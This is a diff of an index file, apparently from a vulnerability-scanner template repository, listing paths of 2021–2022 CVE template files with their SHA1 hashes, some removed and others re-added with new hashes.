-http/cves/2022/CVE-2022-2462.yaml:3761e90e8a9cafa1130de40c771ab87249630bf6 -http/cves/2022/CVE-2022-2467.yaml:9279ba401b45941d04ee919fac2cd2e6e081d6ea -http/cves/2022/CVE-2022-24681.yaml:7f5abacf80a6f9e20eefc412566b359c34fc3876 -http/cves/2022/CVE-2022-24716.yaml:2ba726301b7f40fc8bbe8edb673a95119bf18672 -http/cves/2022/CVE-2022-24816.yaml:98424b0906357f41f5f5dfb16a7b4ed008a58255 -http/cves/2022/CVE-2022-24856.yaml:0d2fa65facb495d3814c2ee7c09160ac06be8c76 -http/cves/2022/CVE-2022-2486.yaml:3fec59c0d28d1904287c07ed745080effd3ba01d -http/cves/2022/CVE-2022-2487.yaml:f43538b2c8d81bc327db468f92df9edb7994dfb5 -http/cves/2022/CVE-2022-2488.yaml:ddc88f2a25b459cdbca91559b229c52ce11337a9 -http/cves/2022/CVE-2022-24899.yaml:704978805bd3702632262624a1660acb672157cb -http/cves/2022/CVE-2022-24900.yaml:737518454f6e7afa20c0cb841f5a75414b672bad -http/cves/2022/CVE-2022-24990.yaml:f692df2a68aa0f11ed839baad0dd6a5d75f48712 -http/cves/2022/CVE-2022-25082.yaml:4e6f1150484c0a58f17a67e7a421b76a773b6912 -http/cves/2022/CVE-2022-25125.yaml:e69c16e6140d748d8b0dfe84cdcdbd70ee0bf193 -http/cves/2022/CVE-2022-25216.yaml:9731668fa1efd8c80cc1fbd3f70fec3b0aa32484 -http/cves/2022/CVE-2022-25323.yaml:dfccdb635d3581eb30083ded6eb77d307ab6f619 -http/cves/2022/CVE-2022-25356.yaml:911f775e379a3949dc546eacabbb25b7c863d969 -http/cves/2022/CVE-2022-25369.yaml:bfaa61efc77bdca0c4998b058eeab50e85a73701 -http/cves/2022/CVE-2022-2544.yaml:3232246ddbe760e19532c41a30cf23e7b7d3ac46 -http/cves/2022/CVE-2022-2546.yaml:c5ffc21f0ebe04a1355db87a7cfd57505bfdff3b -http/cves/2022/CVE-2022-25481.yaml:be654890de970597865900c551a0eedfe77abd10 -http/cves/2022/CVE-2022-25485.yaml:862e9282841ab6be897cf1b5aa0ac69db71aae49 -http/cves/2022/CVE-2022-25486.yaml:6a2e40600c3e082a4746da7cc71a2609d716f6c1 -http/cves/2022/CVE-2022-25487.yaml:ec7155b792815c479bdaf8e2e6ea28ec7c09b858 -http/cves/2022/CVE-2022-25488.yaml:41204e277b6d9f9296785571440bbfb8dd9a870a -http/cves/2022/CVE-2022-25489.yaml:b9dc2ca6a0af9571c8ceb26613d74cdb0bdfcce2 -http/cves/2022/CVE-2022-25497.yaml:847c1ff624531d34403b20c131448405c8c15a40 -http/cves/2022/CVE-2022-2551.yaml:41161c65612f54a59397cddca50432a08ba14354 -http/cves/2022/CVE-2022-2599.yaml:6c6acbb8beb3fbb52645b4a567959ac7fb82384e -http/cves/2022/CVE-2022-26134.yaml:98c692a88a5c237e1c85e8d1c1b720636f72ba9c -http/cves/2022/CVE-2022-26138.yaml:75165263932b6db83190ce92a22b9ed3007ccd9d -http/cves/2022/CVE-2022-26148.yaml:3d63c3c54ccceebb6834e30ac08e30ba14cabeea -http/cves/2022/CVE-2022-26159.yaml:3b77229394b437c585c570e3253c1f56690a2bb5 -http/cves/2022/CVE-2022-26233.yaml:bf0b2d1e3cc09228bb8fa9cdedf39d425dd73adc -http/cves/2022/CVE-2022-26263.yaml:28ef01e032bc2a5fe99e8de5677f4350b711d1e7 -http/cves/2022/CVE-2022-2627.yaml:d026b886c144d021596fa224edc521639a3c4a05 -http/cves/2022/CVE-2022-2633.yaml:eb0d6e871e026e54ea530a19ee544c7523a43515 -http/cves/2022/CVE-2022-26352.yaml:117ad67580f651f62733b47d50fd68de369bacbe -http/cves/2022/CVE-2022-26564.yaml:48eeb6c3f3af813ff7f60114e697000288d5e80d -http/cves/2022/CVE-2022-26833.yaml:1859ee6c5fa0e7635767975f8e24666ce482082f -http/cves/2022/CVE-2022-26960.yaml:cf62f34d78b808fb4de0804bb6d7c15553181c08 -http/cves/2022/CVE-2022-2733.yaml:2ec126cbc33c45b67fb3f4c2937b58e75e7bb32e -http/cves/2022/CVE-2022-2756.yaml:916c3e9b0190f4c0abbf5a8352dcc92bdf47d500 -http/cves/2022/CVE-2022-27593.yaml:fa51a0d5b4c944869a07013843e99a6b32122b1c -http/cves/2022/CVE-2022-27849.yaml:fa7aeedc21c5e0497016b16ab36970ca137faa41 -http/cves/2022/CVE-2022-27926.yaml:54645739e82c07116a7ac99048aea415ba70f90d -http/cves/2022/CVE-2022-27927.yaml:c4a2944404a4f04b5f1556887dea1ed8d2acd66e -http/cves/2022/CVE-2022-27984.yaml:3b44b330188c342c9afc956cdca4c4cb994a8c69 -http/cves/2022/CVE-2022-27985.yaml:5ed8ab4f91d271fd395dcd500f883972abfc7855 -http/cves/2022/CVE-2022-28022.yaml:ba6d9e72b9d34ba60a8c75c03960abfc1909ed2d -http/cves/2022/CVE-2022-28023.yaml:d4744f4049cfd325eb35f0284da81a29ecad1ab6 -http/cves/2022/CVE-2022-28032.yaml:af782013df40c0857ed3930b798925a638ccfecf -http/cves/2022/CVE-2022-28079.yaml:250910c4a9e1d0b9643c3441ebf816ee7d0d1418 -http/cves/2022/CVE-2022-28080.yaml:93ff12492e95ee3a908bae38652e3d7e0e6f4646 -http/cves/2022/CVE-2022-28117.yaml:4cf47677051428f167d4b19a53c55346a1a5862b -http/cves/2022/CVE-2022-28219.yaml:c1877c9b00e04d2d08be1fc9e0234a00e7190a1f -http/cves/2022/CVE-2022-28290.yaml:fb2f580ddb8a7c56cf392cc2b631ec9e3a9c2194 -http/cves/2022/CVE-2022-28363.yaml:a8a817e542c081ad7c3047a7b1918d5bf0f83f6a -http/cves/2022/CVE-2022-28365.yaml:563400d9c357d42c20b7f6b30bd5aad8ac9ddd23 -http/cves/2022/CVE-2022-2863.yaml:c7bad39677296f3a73348a179ad0d5b410143b94 -http/cves/2022/CVE-2022-28923.yaml:60e50de16c30716836caef99c4c70b900dcccafa -http/cves/2022/CVE-2022-28955.yaml:6f264584a6401afb2524832feed8c82ca8bf195c -http/cves/2022/CVE-2022-29004.yaml:c3e82339b7aa715f6b5899fcd4dd3d53b7074b2f -http/cves/2022/CVE-2022-29005.yaml:a6f6321c73b80b1d0d73331a49a2e30a41265233 -http/cves/2022/CVE-2022-29006.yaml:d086ebc88c8d9ea227c5c859866208f8443b392a -http/cves/2022/CVE-2022-29007.yaml:30614bab1352047284dc2089ffa9735f222d063c -http/cves/2022/CVE-2022-29009.yaml:d66db2bf1a8b89a7eb8303e38bd2d6455169a645 -http/cves/2022/CVE-2022-29014.yaml:a9d6434656246279d10954b550d64051b7d2e159 -http/cves/2022/CVE-2022-29078.yaml:3767d986a4d956a488eb6cc7e2e75a57828fd797 -http/cves/2022/CVE-2022-29153.yaml:79ff7289ec5c40584196adf9339012af1ffc5690 -http/cves/2022/CVE-2022-29272.yaml:aa1ff45c2e2a7d7bfb42c1b9fc6adc11e64580c3 -http/cves/2022/CVE-2022-29298.yaml:81f0c7fca3ae70154935bb0d8ea5fe7cdcc55116 +http/cves/2021/CVE-2021-46379.yaml:bb58f39fe80e3d4dd4b2a89e99f435c909878682 +http/cves/2021/CVE-2021-46381.yaml:0aa211cb8fdfc6be5cf03b776d7007f851d2a31f +http/cves/2021/CVE-2021-46387.yaml:53890ddf04f1b2863a0c0d97ca00decb710e0551 +http/cves/2021/CVE-2021-46417.yaml:ee5058908cbf1486587c3618c4ee206fb9b523cb +http/cves/2021/CVE-2021-46422.yaml:105e6e24cc8b472d640e4d872a5124fc36943d82 +http/cves/2021/CVE-2021-46424.yaml:a559a2b08b5e40a006d8d8af8cef6c181cdd1ee8 +http/cves/2021/CVE-2021-46704.yaml:a4073c534dafaaa7d6b854420e093b4c0a548a89 +http/cves/2022/CVE-2022-0140.yaml:cc46ad0de8e76728d747bf3a4c3b423be976ea61 +http/cves/2022/CVE-2022-0147.yaml:07f33c7f2c3eb0b0b58019a9fe207813a7b75c9b +http/cves/2022/CVE-2022-0148.yaml:645cf3b34c0a5a4dd68d4e87cff84632d55b650c +http/cves/2022/CVE-2022-0149.yaml:941f93d76ba2271e7bf0558099c3cff7e76537c9 +http/cves/2022/CVE-2022-0150.yaml:614bb85b232d1f9308925c1f8b7b240ec82825c3 +http/cves/2022/CVE-2022-0165.yaml:7dcc5ab8c87dcc165f62d94e2691baec5b135c22 +http/cves/2022/CVE-2022-0169.yaml:88761f0b16e75a6cc5fbcac6f06d42e301eec9ab +http/cves/2022/CVE-2022-0189.yaml:fecb80fd48d7ab52eaa5074fcaaec00b9ea9aae0 +http/cves/2022/CVE-2022-0201.yaml:dfdd7bbe3bd60aa37196161a0412dba0d0ef3a6a +http/cves/2022/CVE-2022-0206.yaml:8e11954873059cb5aeeb751b8826eb6ea80574b9 +http/cves/2022/CVE-2022-0208.yaml:e13f5fd83fe4929c5c199c6fc85ee8ea860c056b +http/cves/2022/CVE-2022-0212.yaml:9e8046a5e38d92daee80a8f7542c3ad674f244da +http/cves/2022/CVE-2022-0218.yaml:801bf3ea5ed4bc7ee943bbac0c6845e6ebb70485 +http/cves/2022/CVE-2022-0220.yaml:f4a469f2b7f9432148a7e03f8b08a5ce9521a771 +http/cves/2022/CVE-2022-0234.yaml:3fe423684b4010f92db9a283e3653745a5406687 +http/cves/2022/CVE-2022-0271.yaml:b3ae19c1f348421b912b846ed3abd3c86b8886db +http/cves/2022/CVE-2022-0281.yaml:6e77aee0fba0471142f1179d421187fe3abaf0b3 +http/cves/2022/CVE-2022-0288.yaml:e97af486bfb32153bc82cc57248e039d7c0ce1ec +http/cves/2022/CVE-2022-0346.yaml:dacfe3b292547a36c12e191beab325beb459f65f +http/cves/2022/CVE-2022-0349.yaml:57f1ae6f6fa0d9d0db97f1356741830fc839f46e +http/cves/2022/CVE-2022-0378.yaml:83fd86cd6160da3bea1c1abc60fe643d9a4fa784 +http/cves/2022/CVE-2022-0381.yaml:ffa0819ef6b74828e7f6ce63867d2ce17b577211 +http/cves/2022/CVE-2022-0412.yaml:30dc884998f380311b0c5de61d401db7fc9c2cc9 +http/cves/2022/CVE-2022-0415.yaml:185667ee98810819576fea9e9f2f8882be4071d5 +http/cves/2022/CVE-2022-0422.yaml:3469322798d58b3166f7aa97576758a7d7801104 +http/cves/2022/CVE-2022-0432.yaml:1557e7e3bf75b9eeb91796d0ced241f4ee75855b +http/cves/2022/CVE-2022-0434.yaml:762c2150d62997e90ef0d71482c05fde65d9580e +http/cves/2022/CVE-2022-0437.yaml:f8722fa6a55bee87fe4367bf9815516b8fa77882 +http/cves/2022/CVE-2022-0441.yaml:fe86eae2838e0740f54d5fb7e109ed88424f1af4 +http/cves/2022/CVE-2022-0482.yaml:37140b14e0e4967d70d3b57792d8a921064582fd +http/cves/2022/CVE-2022-0535.yaml:9d198f8d5bb52cd0ac37edeaeb308562adaebfde +http/cves/2022/CVE-2022-0540.yaml:34d9c99b9fb5a96c5dc113d2559d857996c4ee23 +http/cves/2022/CVE-2022-0591.yaml:6d574e04a9c982b2dd7a692e92001ad9cfc04db6 +http/cves/2022/CVE-2022-0594.yaml:275f880ff9653b479029619f045cf441adcc8746 +http/cves/2022/CVE-2022-0595.yaml:73265772d9c810ed637f4600f7c492771aeabbe7 +http/cves/2022/CVE-2022-0599.yaml:65f73416beb10f3de6c02cef7fef1eb24ac7e200 +http/cves/2022/CVE-2022-0653.yaml:eafb883b6359350d391b3a27d497c3cccc1f7f62 +http/cves/2022/CVE-2022-0656.yaml:631675b0d48718035ea7eb27fe84ff88ec68ebe8 +http/cves/2022/CVE-2022-0660.yaml:58c18fcea878af1e455934e5e0014ef126b618e1 +http/cves/2022/CVE-2022-0678.yaml:d06f598818290e9c93190102a6d423cfa1d53de9 +http/cves/2022/CVE-2022-0679.yaml:0aba00e4d431687f05ad2325fe207dbc30c1c700 +http/cves/2022/CVE-2022-0692.yaml:891770803e666b1ed5bfbb809d6f179d343990d7 +http/cves/2022/CVE-2022-0693.yaml:f54ad18422baab021e6481bae9e4ebadcddc5c72 +http/cves/2022/CVE-2022-0735.yaml:b7a63345670d4b80e0c6ab16f17429325caeef45 +http/cves/2022/CVE-2022-0747.yaml:4b7dabcc16adaacae53bd49543376c732f40fb4d +http/cves/2022/CVE-2022-0760.yaml:f8de9832599c6d0c873a0019df82e631bd77a88c +http/cves/2022/CVE-2022-0769.yaml:b319f7b76ed80b9c3c5553709714eae2b366f135 +http/cves/2022/CVE-2022-0773.yaml:08279b2f72b5a99caf1dcc24c1372b166dc75aaa +http/cves/2022/CVE-2022-0776.yaml:7c8ef61f3398b52680370d898d2506f8c083e3a2 +http/cves/2022/CVE-2022-0781.yaml:a0c5365a0ab05ef368d2002bf0bd25c970c6ffae +http/cves/2022/CVE-2022-0784.yaml:71ef22d01eb8a119c2e9f8efd7d6d05b96d661b8 +http/cves/2022/CVE-2022-0785.yaml:6f2cbf74d2b138dde54ff10d7b668b1873faef8e +http/cves/2022/CVE-2022-0786.yaml:fbaae5957500d54050894c3dd28d3e0a9a9baf3b +http/cves/2022/CVE-2022-0788.yaml:e83e5804fd672a33c96d50af4f2e1e5b16d45dba +http/cves/2022/CVE-2022-0817.yaml:f9ce422c143327ee2a64e40efa7d8a1be169dc07 +http/cves/2022/CVE-2022-0824.yaml:562ca18f50f74aa4be198fb631877a49636b3f55 +http/cves/2022/CVE-2022-0826.yaml:e8c3eb6fa088cd81cbf495dbea480730d164be55 +http/cves/2022/CVE-2022-0827.yaml:31f65bb0db0d25bb775b0ec9c8d156509ba79ea5 +http/cves/2022/CVE-2022-0846.yaml:9c6ca29ab073ba6f9315db6fc741f69c8fd3b4fc +http/cves/2022/CVE-2022-0864.yaml:b116d6bddac696542eb55e6f16d05b4cf4c5e5b9 +http/cves/2022/CVE-2022-0867.yaml:1632a8823af634b158bd117b5d9e6dd539757108 +http/cves/2022/CVE-2022-0869.yaml:45c812a97eb18035fd94236adaf36f6952816fc2 +http/cves/2022/CVE-2022-0870.yaml:b04212cc8a23926639390a74976be82c375085e8 +http/cves/2022/CVE-2022-0885.yaml:f23954f3cfd29bfda9f6fed98f03bd3ba5b928ce +http/cves/2022/CVE-2022-0928.yaml:1fa2fa89acacb3c813f3bb5596fa53cd7d68b5c7 +http/cves/2022/CVE-2022-0948.yaml:f5585a39d2b8ec3725a164693929dd794a41efdc +http/cves/2022/CVE-2022-0949.yaml:e387b858175da9909cd52fefb354fd87bdf6f8f9 +http/cves/2022/CVE-2022-0952.yaml:07b56b938b7df82c9ef0d0812eeb88bf046d3de7 +http/cves/2022/CVE-2022-0954.yaml:c4e2fee0856bafef9c908f78c5315cec167febce +http/cves/2022/CVE-2022-0963.yaml:a83c18c488b0b99514653329b645075f3f8b8b9a +http/cves/2022/CVE-2022-0968.yaml:7a66001266e14e3b1df6f3a715284a18f1c44905 +http/cves/2022/CVE-2022-1007.yaml:9f88416087efe0113af15a4bc6845ea16e2929f4 +http/cves/2022/CVE-2022-1013.yaml:6ae111ec04f2d8dc9f3dee6a5d6ee2480c502813 +http/cves/2022/CVE-2022-1020.yaml:6b8a4fd0b36e814008b234d705b5ce5bb96ea824 +http/cves/2022/CVE-2022-1040.yaml:a2274ceedb11e3906ebbe3aa8785f778e469f1ba +http/cves/2022/CVE-2022-1054.yaml:c3d80c88d596764077992ccbd3f9e97e6f534073 +http/cves/2022/CVE-2022-1057.yaml:99e510b58b3a27764dd6e5927b9d14f310238a33 +http/cves/2022/CVE-2022-1058.yaml:5417418cd1187cdd6b25e088521f21d692e61b45 +http/cves/2022/CVE-2022-1119.yaml:89cddfd270b24e5414e6740156da9480102c27a3 +http/cves/2022/CVE-2022-1162.yaml:4c745aaa022f82b18bfeddfd3749d1ef20a4890d +http/cves/2022/CVE-2022-1168.yaml:8c99bef47af5fd33d205a1f47ce4f98fe0744f50 +http/cves/2022/CVE-2022-1221.yaml:ee3698a590f585077cff97b1401c936a79b71b78 +http/cves/2022/CVE-2022-1329.yaml:7222fc07204c4db075bbd36418fee1752cdbbf7c +http/cves/2022/CVE-2022-1386.yaml:5e15636442efa4bae16f39486e464e32913d5a7d +http/cves/2022/CVE-2022-1388.yaml:94f1e18c6999928cf737a2a6fa29c80e57c7ee31 +http/cves/2022/CVE-2022-1390.yaml:1093d4c2d89bf98de91bce66b21d8607c67e9f47 +http/cves/2022/CVE-2022-1391.yaml:8e7df92b4354cb9762ac18add0da0ab7c911c46c +http/cves/2022/CVE-2022-1392.yaml:c2662a9cde1c952187f6ecdc5aab8d83169cdb2d +http/cves/2022/CVE-2022-1398.yaml:3a404bd6cfdc4cd28c07720ad02b9e078f38b64d +http/cves/2022/CVE-2022-1439.yaml:fda8648d8126c803bc8d4cd44e83134ab41db3df +http/cves/2022/CVE-2022-1442.yaml:65a350a020f0d5dd861c8f51d24849cf8a7207df +http/cves/2022/CVE-2022-1574.yaml:0c6235e9dbeb8d441c939cc2b80170a1ebb65d31 +http/cves/2022/CVE-2022-1595.yaml:810145a34dd431b2a4930541e2064f098caddec7 +http/cves/2022/CVE-2022-1597.yaml:7e43e049a2c74bbd242d0fd1dd2f0651b5cf6080 +http/cves/2022/CVE-2022-1598.yaml:a27e4af88fbe0c064884aad06dd27a436d8504ce +http/cves/2022/CVE-2022-1609.yaml:cb6f1bd6fc66e873c106dd59c98023d8ad16243f +http/cves/2022/CVE-2022-1713.yaml:5db1fc5383736deead6e866ef930d1e2ddc478d7 +http/cves/2022/CVE-2022-1724.yaml:bc5f3b4cf8394bb8c8e180b0f605fd2867a30c57 +http/cves/2022/CVE-2022-1756.yaml:909ea951e1e534d06f8577a4a9feffaa9633ff3b +http/cves/2022/CVE-2022-1768.yaml:881c0747211f44e3fa0b5723412fe8dea22f7391 +http/cves/2022/CVE-2022-1815.yaml:8ea0d069da47754b39751883125c96855b685f54 +http/cves/2022/CVE-2022-1883.yaml:eab9d12f16d3f77adec37da0cf02c502a6597007 +http/cves/2022/CVE-2022-1903.yaml:69087d2aeb72c44f13c13aa68e9ea209737c2651 +http/cves/2022/CVE-2022-1904.yaml:09008bd46d9ba255a617b2a66dc695e360605684 +http/cves/2022/CVE-2022-1906.yaml:c0b71e22411946550665a0619ca6c36a63231075 +http/cves/2022/CVE-2022-1910.yaml:51d1994c20dc0aa4694065a9634162f918d43dad +http/cves/2022/CVE-2022-1916.yaml:0b069a01736d8e296f6c03231b33d97ed814040e +http/cves/2022/CVE-2022-1933.yaml:f9d5f1054cd151818e29482e5ff081f7ef086b2f +http/cves/2022/CVE-2022-1937.yaml:6e2ebe2768efe2e86ea2e03097f147e134fcdc9e +http/cves/2022/CVE-2022-1946.yaml:e04a67c3ed6db6ec6e9eeffc8e3cda470647b255 +http/cves/2022/CVE-2022-1952.yaml:ca9fd4d46c24967dd6554f83ba2e3c266946a43c +http/cves/2022/CVE-2022-2034.yaml:6213a9331e4baa86b06687609e5f1b0c4fb18fe8 +http/cves/2022/CVE-2022-21371.yaml:838e998d636780fb9bf60710d77d5af72626c02a +http/cves/2022/CVE-2022-21500.yaml:7eb0540d82e15ca5ce1a7efc48709e544ee060f3 +http/cves/2022/CVE-2022-21587.yaml:069a3c686c7abfd2d7d647bb6c1f897a48efc20b +http/cves/2022/CVE-2022-21661.yaml:577fc02d5795f83a993bb4e6482dd82700126f2c +http/cves/2022/CVE-2022-21705.yaml:53bfd7db568e0d1362c4af5a8a7e6aa61d9eaa9c +http/cves/2022/CVE-2022-2185.yaml:4bf46c9a2d85a44d1f1c18dcf0bff87c9c9a83e7 +http/cves/2022/CVE-2022-2187.yaml:e10b24d910b3414453ed73ba04e35cdc828166b4 +http/cves/2022/CVE-2022-2219.yaml:9bf51ed9a003456f61039a169fdb0659fa70f921 +http/cves/2022/CVE-2022-22242.yaml:94d9f81160ac82e4ddcf26fb82e878646a22149b +http/cves/2022/CVE-2022-22536.yaml:48323ba99c43e3559cb76d72e5e5ae758d28820e +http/cves/2022/CVE-2022-22733.yaml:b3eff5f104d4e6cd641aab56d3012360f6e69129 +http/cves/2022/CVE-2022-22897.yaml:65dfd4390db25892256cf4ba209e42669fa027a0 +http/cves/2022/CVE-2022-2290.yaml:acded3ed2034d900dd6b62347b1d971d865a5a6b +http/cves/2022/CVE-2022-22947.yaml:a551f88f69550f1bfe13d791fac80c83e1ef2586 +http/cves/2022/CVE-2022-22954.yaml:ccafdd1768f90c0300d1adf4d8c28c3937173153 +http/cves/2022/CVE-2022-22963.yaml:f1fa0a249f42afd022006722a378ddd4bf2feafe +http/cves/2022/CVE-2022-22965.yaml:eb734940ca2fbf1a5dc6ae791e60dbcb47a92100 +http/cves/2022/CVE-2022-22972.yaml:9816e702eb3224f6dfe906b06be9c30dc637a02d +http/cves/2022/CVE-2022-23102.yaml:340ffa6e9f020955a36d2ac4990e3efe5430fd4a +http/cves/2022/CVE-2022-23131.yaml:b142d3f20274e757752c27fe0d443608a6c6dfd7 +http/cves/2022/CVE-2022-23134.yaml:71bff2d924886a85c2322c12e4212d86c5c76e92 +http/cves/2022/CVE-2022-2314.yaml:16285c0ba9ac51fa60a179847c798e6c3e95166e +http/cves/2022/CVE-2022-23178.yaml:a0e11e95655aea47789b0e75a8629196db97a4c4 +http/cves/2022/CVE-2022-23347.yaml:ee159a53f7d8df7d7a68560884c4d163ffd424c2 +http/cves/2022/CVE-2022-23348.yaml:d0b65db29bffd5f436a0626f4b2bca5b14e7a5cd +http/cves/2022/CVE-2022-23544.yaml:aa4239b78b89887683752babd12eee7ab99f7639 +http/cves/2022/CVE-2022-2373.yaml:10b9e293f0b9e8e6a4b969a7695b770e1f6b92f2 +http/cves/2022/CVE-2022-2376.yaml:7fa22848187ad7a4dec1df8099dff98ad5d19760 +http/cves/2022/CVE-2022-23779.yaml:908b42f9d1ca99b5a35b1836d2d0426f0323b54c +http/cves/2022/CVE-2022-2379.yaml:219036ac6d1f54b0aeaa4702762c6aeff64e74f0 +http/cves/2022/CVE-2022-23808.yaml:942a54a667b2ff5a0870e52a4c8ed059be0244f2 +http/cves/2022/CVE-2022-2383.yaml:3b08dc9938d2db696cd1eaec1a428605d4091f1c +http/cves/2022/CVE-2022-23854.yaml:9ba51cb33a25e83213f2b499552e46d54fc4156a +http/cves/2022/CVE-2022-23881.yaml:ca2ba23327ccaac43377d0f8f98e9ba50ba5f94d +http/cves/2022/CVE-2022-23898.yaml:c3d1aca3299b5978fe0db2026bb22ddb7b9423b4 +http/cves/2022/CVE-2022-23944.yaml:8c08e2b52f46a2bc3b625239b2106de67220367f +http/cves/2022/CVE-2022-24112.yaml:e6758ce0bd17ab5e775398e73833528defb4dff1 +http/cves/2022/CVE-2022-24124.yaml:8acc5c716bc13566edfa24f56e65990024d2b0e9 +http/cves/2022/CVE-2022-24129.yaml:5edb642adc522152b03dc0abaa77f3508d209c44 +http/cves/2022/CVE-2022-2414.yaml:0b465d2ed6553b774342726ac1713966efd4c728 +http/cves/2022/CVE-2022-24181.yaml:ecc6f680258b6b2884bc687d1a63622b2995f8b1 +http/cves/2022/CVE-2022-24223.yaml:242bf37850b69b968713d77052953490b687f31d +http/cves/2022/CVE-2022-24260.yaml:c859eb8c470c97c3f05f6141428de415859faf58 +http/cves/2022/CVE-2022-24264.yaml:4dc8e50a466ccc64165e08da70da05af371f62e7 +http/cves/2022/CVE-2022-24265.yaml:60686923812fec2aecd45b466e97681e73ef88e3 +http/cves/2022/CVE-2022-24266.yaml:0a719da6f6605a9f17d0f27a5cac071957d8651c +http/cves/2022/CVE-2022-24288.yaml:4f4982bbd58466c0963c000c9225c7bc4fe91e97 +http/cves/2022/CVE-2022-24384.yaml:a88509d75bdb2375f50d25c374d50eb7a67816f7 +http/cves/2022/CVE-2022-2462.yaml:d6e2c2fde474ee16c1dc8b490b6f8b5c8b80dbfd +http/cves/2022/CVE-2022-2467.yaml:bd55ea795abad6bf959437f5fd73251c0cb4c972 +http/cves/2022/CVE-2022-24681.yaml:3700d2975b74b0417542002fe3b6c8c2a1884be6 +http/cves/2022/CVE-2022-24716.yaml:2f131702fa8532021f931ae4ae2c692c575373e5 +http/cves/2022/CVE-2022-24816.yaml:3dce69981f54620c0800e6a7540f977f55aad60f +http/cves/2022/CVE-2022-24856.yaml:62f81e2b37b09e48f4d888b7bb9ff5294dbd9c16 +http/cves/2022/CVE-2022-2486.yaml:243b9cafc9017cd45b009fcff538696ac699544e +http/cves/2022/CVE-2022-2487.yaml:a3e0253b51ee172df5590b826b1d4ff86c90e3a3 +http/cves/2022/CVE-2022-2488.yaml:be4c122ec3080ef025ed453445fcae8171e00c0b +http/cves/2022/CVE-2022-24899.yaml:edbfe9fab0d695c80f907d51b9d8b4dabedf5580 +http/cves/2022/CVE-2022-24900.yaml:e7a67a9c54f54b690a18fb23856e0fe2a04c91aa +http/cves/2022/CVE-2022-24990.yaml:b4ba7fed826e963bf77573ed27a8518eb210ccbd +http/cves/2022/CVE-2022-25082.yaml:5b34ca9edd69a00dc682949c5da9afa436821f8a +http/cves/2022/CVE-2022-25125.yaml:fe728bfe489c433e0a662c8c8cf7c35cb220ffb6 +http/cves/2022/CVE-2022-25216.yaml:4380e49ffdc0c13289d1c05d594cdde39d81dab2 +http/cves/2022/CVE-2022-25323.yaml:e0f242630fa38e8565f318970336004ef21bd22a +http/cves/2022/CVE-2022-25356.yaml:c786dddc3693bd3e9bd4505b4ae357166180ccb1 +http/cves/2022/CVE-2022-25369.yaml:395d04f9dbc8abdd6af75398681e19d1f0c84834 +http/cves/2022/CVE-2022-2544.yaml:fd0e71f3d408e046de0738584a0054c41aa89ad4 +http/cves/2022/CVE-2022-2546.yaml:35b4724322cd1f2a8a2ab70bf78ac2f0d8e1a089 +http/cves/2022/CVE-2022-25481.yaml:191e383ad500b4442898f91ce55210b8864f5c2c +http/cves/2022/CVE-2022-25485.yaml:9c40e7b3215f5f77ef81b76429dc457a23b28bad +http/cves/2022/CVE-2022-25486.yaml:e1a2b6e1c21b69cb6a5d56218d57105e16b56342 +http/cves/2022/CVE-2022-25487.yaml:680ceab786876251b609cc1738be68f9a0d14723 +http/cves/2022/CVE-2022-25488.yaml:4c3dba7ec05ca295501dc4cfc2663fadf817574f +http/cves/2022/CVE-2022-25489.yaml:63a5061483b2909dc50f03f333bdb1ab8a9cfcd4 +http/cves/2022/CVE-2022-25497.yaml:f795731c032d02fbc7d2200376cd21f4a8e8547c +http/cves/2022/CVE-2022-2551.yaml:28b3f1ad2fdd203177f2dc045c1688190d9e88a7 +http/cves/2022/CVE-2022-2599.yaml:4c7e1e513aab8a183b58067a729365320760f439 +http/cves/2022/CVE-2022-26134.yaml:70a5c7e3c5e0c299ed75210fdb4c24ff16a64072 +http/cves/2022/CVE-2022-26138.yaml:96abcafe0f231bf51460fbf4c2e7b7d4e9aec879 +http/cves/2022/CVE-2022-26148.yaml:8c3553b81ca02b761e2020bed4b8f6619023999f +http/cves/2022/CVE-2022-26159.yaml:c535348fbfcc508123a0a925df06ff278a1f7cc0 +http/cves/2022/CVE-2022-26233.yaml:f533d8dd3f5a24f379804bc6d9fc86dde0f07b42 +http/cves/2022/CVE-2022-26263.yaml:080f3af1337536d5afab63159efbfb45b4529628 +http/cves/2022/CVE-2022-2627.yaml:3b4f2996fab85a916937478d6202c3f8ab88c77a +http/cves/2022/CVE-2022-2633.yaml:daf87635742ab3c0b72cbe08e9d9b307fb1a8add +http/cves/2022/CVE-2022-26352.yaml:87f3d94ab76702710f896823df9f2794a1e23ce7 +http/cves/2022/CVE-2022-26564.yaml:4dad03e9229d498bfd48c3adc64a4ea7353bad39 +http/cves/2022/CVE-2022-26833.yaml:47a66b6eb6ce6aea79ba42a9cc2fa2ea2f2e9951 +http/cves/2022/CVE-2022-26960.yaml:2aeda58dbd5ac0203fdd01c1ea77345080244cae +http/cves/2022/CVE-2022-2733.yaml:8181451f53dfa237b0e5353ac2c04a92a844bec8 +http/cves/2022/CVE-2022-2756.yaml:179a3b02c422b97650ec4bfc57ca0494201f7f35 +http/cves/2022/CVE-2022-27593.yaml:b4d04c051d8ff0cdd8c856b66e802efaf6982b58 +http/cves/2022/CVE-2022-27849.yaml:fc8196e83c7132a4ce339529014ee20d7a4b08a9 +http/cves/2022/CVE-2022-27926.yaml:8ecfd4faeebe15eda4ad30bf0c546156ddb23514 +http/cves/2022/CVE-2022-27927.yaml:225adced0c37414d10e71425b9b5314aae2645c5 +http/cves/2022/CVE-2022-27984.yaml:990d663206851d8cef3315383ce0f9faf55da2f4 +http/cves/2022/CVE-2022-27985.yaml:ebd1d2db864f8a614f470b96500d23114b05d5ae +http/cves/2022/CVE-2022-28022.yaml:d4367bb3028606c4700868134f8ce0e32a25babf +http/cves/2022/CVE-2022-28023.yaml:e8367e522c56116075c74a2feed1848ec4ef43d6 +http/cves/2022/CVE-2022-28032.yaml:fd555a6f43bb1bab828a7d8418e45a1e292efac6 +http/cves/2022/CVE-2022-28079.yaml:78bd9c7cc07b4b47f04a7520a0693889db9251e9 +http/cves/2022/CVE-2022-28080.yaml:452536485606873e2bf4dc0970edd39db733d06f +http/cves/2022/CVE-2022-28117.yaml:2a300b823395640b5fa5381d1bd23af41c35f72a +http/cves/2022/CVE-2022-28219.yaml:39ab6ddfe43f5c952bb54342cf63273cd593a653 +http/cves/2022/CVE-2022-28290.yaml:00a365c1b88f84d4aebb9fe534354f6a2886b5ac +http/cves/2022/CVE-2022-28363.yaml:08d10341569b2bc58ee6184950662a618dfcf747 +http/cves/2022/CVE-2022-28365.yaml:0d0e65cd1c956d3c6aba833db58d85af951713f1 +http/cves/2022/CVE-2022-2863.yaml:46d5b3c83aed75262a15b4700d3ba59d26338075 +http/cves/2022/CVE-2022-28923.yaml:3c7ba7c7a61bc7069174a119fb02e7cabd5eda6b 